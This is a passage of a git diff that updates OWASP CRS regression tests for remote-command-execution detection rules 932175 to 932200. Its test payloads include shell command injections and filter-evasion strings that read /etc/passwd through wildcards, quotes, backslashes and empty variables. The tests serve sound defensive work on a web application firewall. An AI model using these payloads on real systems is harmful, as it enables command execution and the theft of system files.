HTTP/1.1 + output: + log: + expect_ids: [932175] + - test_id: 7 desc: "Negative test alias" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - "text=I%20see%2C%20so%20your%20alias%20is%20not%20%3D%20to%20your%20name" - version: HTTP/1.1 - output: - no_log_contains: id "932175" - - test_title: 932175-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + "text=I%20see%2C%20so%20your%20alias%20is%20not%20%3D%20to%20your%20name" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932175] + - test_id: 8 desc: "Negative test alias with quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - "text=The%20pizza%20vendor%20was%20known%20by%20the%20alias%20%22pineapple%22%20online." - version: HTTP/1.1 - output: - no_log_contains: id "932175" - - test_title: 932175-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + "text=The%20pizza%20vendor%20was%20known%20by%20the%20alias%20%22pineapple%22%20online." + version: HTTP/1.1 + output: + log: + no_expect_ids: [932175] + - test_id: 9 desc: "Status Page Test - Test for simple alias example" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?rce=alias%20a=b" - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?rce=alias%20a=b" + version: HTTP/1.1 + output: + log: + expect_ids: [932175] + - test_id: 10 desc: "Test for alias with -p argument" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - rce=alias -p jzfrx=id - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-11 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + rce=alias -p jzfrx=id + version: HTTP/1.1 + output: + log: + expect_ids: [932175] + - test_id: 11 desc: "Test for alias with zsh flags" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - rce=alias -gmr a=b - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-12 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + rce=alias -gmr a=b + version: HTTP/1.1 + output: + log: + expect_ids: [932175] + - test_id: 12 desc: | Test for alias with zsh '+' flags. Payload: "alias +m a=b" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?rce=%61%6c%69%61%73%20%2b%6d%20%61%3d%62" - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-13 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?rce=%61%6c%69%61%73%20%2b%6d%20%61%3d%62" + version: HTTP/1.1 + output: + log: + expect_ids: [932175] + - test_id: 13 desc: | Test for alias with trailing '+' in a flag. Payload: "alias +g+ a=b" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?rce=%61%6c%69%61%73%20%2b%67%2b%20%61%3d%62" - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-14 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?rce=%61%6c%69%61%73%20%2b%67%2b%20%61%3d%62" + version: HTTP/1.1 + output: + log: + expect_ids: [932175] + - test_id: 14 desc: "Test for alias with zsh flags" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - rce=alias ls-al='ls -al' - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-15 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + rce=alias ls-al='ls -al' + version: HTTP/1.1 + output: + log: + expect_ids: [932175] + - test_id: 15 desc: "Test for alias with zsh flags" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - rce=alias ..='cd ..' - version: HTTP/1.1 - output: - log_contains: id "932175" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + rce=alias ..='cd ..' + version: HTTP/1.1 + output: + log: + expect_ids: [932175] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932180.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932180.yaml index 5784dde62..fa512935b 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932180.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932180.yaml @@ -2,82 +2,81 @@ meta: author: "Franziska Bühler, azurit" description: "Restricted File Upload Attempt" - enabled: true - name: 932180.yaml +rule_id: 932180 tests: - - test_title: 932180-1 + - test_id: 1 desc: "Test file upload with request header X-Filename and filename settings.php" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - X-Filename: settings.php - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "932180" - - test_title: 932180-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + X-Filename: settings.php + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [932180] + - test_id: 2 desc: "Test file upload with multipart/form-data and filename config.yml" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABCDEFGIJKLMNOPQ - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - ------WebKitFormBoundaryABCDEFGIJKLMNOPQ - Content-Disposition: form-data; name="config"; filename="config.yml" - Content-Type: text/yaml + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABCDEFGIJKLMNOPQ + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + ------WebKitFormBoundaryABCDEFGIJKLMNOPQ + Content-Disposition: form-data; name="config"; filename="config.yml" + Content-Type: text/yaml - ... Some content ... - ------WebKitFormBoundaryABCDEFGIJKLMNOPQ - Content-Disposition: form-data; name="image"; filename="test.png" - Content-Type: image/png + ... Some content ... + ------WebKitFormBoundaryABCDEFGIJKLMNOPQ + Content-Disposition: form-data; name="image"; filename="test.png" + Content-Type: image/png - BINARYDATA - ------WebKitFormBoundaryABCDEFGIJKLMNOPQ-- - output: - log_contains: id "932180" - - test_title: 932180-3 + BINARYDATA + ------WebKitFormBoundaryABCDEFGIJKLMNOPQ-- + output: + log: + expect_ids: [932180] + - test_id: 3 desc: "File upload - negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABCDEFGIJKLMNOPQ - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - ------WebKitFormBoundaryABCDEFGIJKLMNOPQ - Content-Disposition: form-data; name="image"; filename="test.jpg" - Content-Type: image/jpeg + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABCDEFGIJKLMNOPQ + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + ------WebKitFormBoundaryABCDEFGIJKLMNOPQ + Content-Disposition: form-data; name="image"; filename="test.jpg" + Content-Type: image/jpeg - ... Some content ... - ------WebKitFormBoundaryABCDEFGIJKLMNOPQ + ... Some content ... + ------WebKitFormBoundaryABCDEFGIJKLMNOPQ - BINARYDATA - --0000-- - output: - no_log_contains: id "932180" + BINARYDATA + --0000-- + output: + log: + no_expect_ids: [932180] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932190.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932190.yaml index bb7f0da09..2e2b5ae9b 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932190.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932190.yaml @@ -2,112 +2,111 @@ meta: author: "Franziska Bühler, Max Leske, azurit" description: "Remote Command Execution: Wildcard bypass technique attempt" - enabled: true - name: 932190.yaml +rule_id: 932190 tests: - - test_title: 932190-1 + - test_id: 1 desc: "Match wild card evasion in 'cat+/et*/*wd'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?id=cat%2B%2Fet*%2F*wd" - version: HTTP/1.0 - output: - log_contains: id "932190" - - test_title: 932190-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?id=cat%2B%2Fet*%2F*wd" + version: HTTP/1.0 + output: + log: + expect_ids: [932190] + - test_id: 2 desc: "Match wild card evasion in 'cat+/ET*/*WD'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?id=cat%2B%2FET*%2F*WD" - version: HTTP/1.0 - output: - log_contains: id "932190" - - test_title: 932190-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?id=cat%2B%2FET*%2F*WD" + version: HTTP/1.0 + output: + log: + expect_ids: [932190] + - test_id: 3 desc: "Match wild card evasion in '/???/?s'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?id=%2F%3F%3F%3F%2F%3Fs" - version: HTTP/1.0 - output: - log_contains: id "932190" - - test_title: 932190-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?id=%2F%3F%3F%3F%2F%3Fs" + version: HTTP/1.0 + output: + log: + expect_ids: [932190] + - test_id: 4 desc: "No FP in 'Does the * shine bright?'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?id=Does%20the%20%2A%20shine%20bright%3F" - version: HTTP/1.0 - output: - no_log_contains: id "932190" - - test_title: 932190-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?id=Does%20the%20%2A%20shine%20bright%3F" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932190] + - test_id: 5 desc: "Handle single quote evasion mixed with wild card evasion" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - data: "{\"foo\" : \";+cat+/e't'*/pa'?s'wd\"}" - output: - log_contains: id "932190" - - test_title: 932190-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + data: "{\"foo\" : \";+cat+/e't'*/pa'?s'wd\"}" + output: + log: + expect_ids: [932190] + - test_id: 6 desc: "Handle backslash evasion mixed with wild card evasion" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - data: "{\"foo\" : \";+cat+/e\\\\t\\\\*/pa\\\\?s\\\\wd\"}" - output: - log_contains: id "932190" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + data: "{\"foo\" : \";+cat+/e\\\\t\\\\*/pa\\\\?s\\\\wd\"}" + output: + log: + expect_ids: [932190] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml index ba760012d..3f125fc35 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml @@ -2,265 +2,264 @@ meta: author: "theMiddle, Franziska Bühler, Max Leske, azurit" description: RCE Bypass - enabled: true - name: 932200.yaml +rule_id: 932200 tests: - - test_title: 932200-1 + - test_id: 1 desc: globbing patterns stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;/bin/ca?+/et*/passwd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;/bin/ca?+/et*/passwd" + version: HTTP/1.0 + output: + log: + expect_ids: [932200] + - test_id: 2 desc: uninitialized variable stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;cat+/etc/%24%7Ba%7Dpasswd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;cat+/etc/%24%7Ba%7Dpasswd" + version: HTTP/1.0 + output: + log: + expect_ids: [932200] + - test_id: 3 desc: bash function stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;cat+/etc/%24%28echo%29passwd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;cat+/etc/%24%28echo%29passwd" + version: HTTP/1.0 + output: + log: + expect_ids: [932200] + - test_id: 4 desc: uninitialized vars stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;c%24%40at%2B%2Fet%24%40c%2Fpas%24%40swd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;c%24%40at%2B%2Fet%24%40c%2Fpas%24%40swd" + version: HTTP/1.0 + output: + log: + expect_ids: [932200] + - test_id: 5 desc: uninitialized vars stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;c%24%21at%2B%2Fet%24%21c%2Fpas%24%21swd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;c%24%21at%2B%2Fet%24%21c%2Fpas%24%21swd" + version: HTTP/1.0 + output: + log: + expect_ids: [932200] + - test_id: 6 desc: uninitialized vars stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;c%24%2Aat%2B%2Fet%24%2Ac%2Fpas%24%2Aswd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;c%24%2Aat%2B%2Fet%24%2Ac%2Fpas%24%2Aswd" + version: HTTP/1.0 + output: + log: + expect_ids: [932200] + - test_id: 7 desc: uninitialized vars stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;c%24%3Fat%2B%2Fet%24%3Fc%2Fpas%24%3Fswd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;c%24%3Fat%2B%2Fet%24%3Fc%2Fpas%24%3Fswd" + version: HTTP/1.0 + output: + log: + expect_ids: [932200] + - test_id: 8 desc: uninitialized vars stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;c%24-at%2B%2Fet%24-c%2Fpas%24-swd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;c%24-at%2B%2Fet%24-c%2Fpas%24-swd" + version: HTTP/1.0 + output: + log: + expect_ids: [932200] + - test_id: 9 desc: uninitialized vars stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;c%24_at%2B%2Fet%24_c%2Fpas%24_swd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;c%24_at%2B%2Fet%24_c%2Fpas%24_swd" + version: HTTP/1.0 + output: + log: + expect_ids: [932200] + - test_id: 10 desc: uninitialized vars stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;c%24%24at%2B%2Fet%24%24c%2Fpas%24%24swd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-11 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;c%24%24at%2B%2Fet%24%24c%2Fpas%24%24swd" + version: HTTP/1.0 + output: + log: + expect_ids: [932200] + - test_id: 11 desc: "Test first backslash match ([*?`\\'][^/\n]+/) with: c\at /etc/passwd" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;c%5Cat%20%2Fetc%2Fpasswd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-12 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;c%5Cat%20%2Fetc%2Fpasswd" + version: HTTP/1.0 + output: + log: + expect_ids: [932200] + - test_id: 12 desc: "Test second backslash match (/[^/]+?[*?`\\']) with: cat /etc/p\asswd" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;cat%20%2Fetc%2Fp%5Casswd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-13 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;cat%20%2Fetc%2Fp%5Casswd" + version: HTTP/1.0 + output: + log: + expect_ids: [932200] + - test_id: 13 desc: "Test correct logging" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;/bin/ca?+/et*/passwd" - version: HTTP/1.0 - output: - no_log_contains: found within MATCHED_VAR - - test_title: 932200-14 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;/bin/ca?+/et*/passwd" + version: HTTP/1.0 + output: + log: + match_regex: 'found within ARGS:host:' + - test_id: 14 desc: "Test variable assignment ('cat /etc/passwd' assigned via individual variables, cat 